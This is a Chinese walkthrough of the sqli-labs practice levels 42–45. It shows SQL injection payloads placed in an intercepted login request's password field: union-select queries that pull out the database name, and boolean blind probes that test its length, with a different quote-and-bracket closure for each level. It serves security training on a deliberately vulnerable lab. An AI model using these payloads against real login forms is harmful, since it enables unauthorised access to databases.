当前位置: 首页 > news >正文

sqli-labs靶场less40-less45

less42

1.我们打开靶场看一下

2.既然有登录框,那我们就抓包来注入,在密码之后进行注入

1'union select 1,2,3--+

3,接下来我们就可以进行数据库名的查询

1'union select 1,database(),3--+

4.剩下的部分和之前一样,只需要进行抓包在密码的地方注入即可

less43

1.这一关和上一关做法一样,只是闭合方式为’)

1')union select 1,database(),3--+

2.剩下的和上一关一样,只有闭合方法不同

less44

1.我们打开靶场看一下

2.我们在登录的时候进行抓包,然后再name和passwd后面都写为以下语句,当有一个的值不在为真时就会报错

1'and 1=1--+

3.当name的判断保持为真时,passwd的判断为真为假返回的内容不同,那我们就可以使用布尔盲注来判断,首先判断一下数据库名字的长度

1'or+length(database())>1--+
1'or+length(database())>8--+

4.剩下的步骤就可以使用这方法继续往下做

less45

1.这一关和上一关的区别在于闭合方式不同,变为了‘),爆长度的语句变为了

1')or+length(database())>1--+
1')or+length(database())>8--+

2.剩下内容与上一关的内容相差不多

http://www.dtcms.com/a/317280.html

相关文章:

  • uniapp 通用地磅称重系统手机端
  • 生成网站sitemap.xml地图教程
  • android 设置字体样式
  • QT----QAxObject在子线程中调用,发现excel指针为空
  • NCD57080CDR2G 安森美onsemi 通用驱动器, SOIC, 8针, 20V电源, 8 A输出NCD57080CDR2电流隔离式栅极驱动器
  • Excel制作尖刀图,直观展示业绩涨跌
  • 【Excel】通过Index函数向下拖动单元格并【重复引用/循环引用】数据源
  • Unity模型显示在UI上
  • mysql 8递归查询
  • AMD二季度净利润同比下降31%
  • 企业级建模平台Sparx EA的云服务实现全域架构协同
  • imx6ull-驱动开发篇11——gpio子系统
  • django permission_classes = [AllowAny] 如何限制到具体接口
  • 得物向量数据库落地实践
  • 智慧二次供水管理系统解决方案:城市供水“最后一公里”
  • 【面试场景题】电商秒杀系统的库存管理设计实战
  • Docker swarm 常用的命令集合
  • 线轨矫平机:让“钢轨”变直的幕后物理课
  • 移动端网页调试实战,跨设备兼容与触控交互问题排查全流程
  • SassSCSS:让CSS拥有超能力的预处理器
  • `<dependencyManagement>`内部的`<dependencies>`和外部的`<dependencies>`的区别:
  • Spring Boot全局异常处理与日志监控实战指南
  • 浙江大学PTA程序设计C语言基础编程练习题6-10
  • Python爬虫实战:研究Photon工具,构建企业信息收集系统
  • 【Java】HashMap的key可以为null吗?如何存储的?
  • 线性代数中矩阵的基本运算运算
  • 【图像处理基石】浅谈3D城市生成中的数据融合技术
  • 分布式微服务--GateWay(1)
  • 【注意】HCIE-Datacom华为数通考试,第四季度将变题!
  • 基于Hadoop的木鸟民宿数据分析与可视化、民宿价格预测模型系统的设计与实现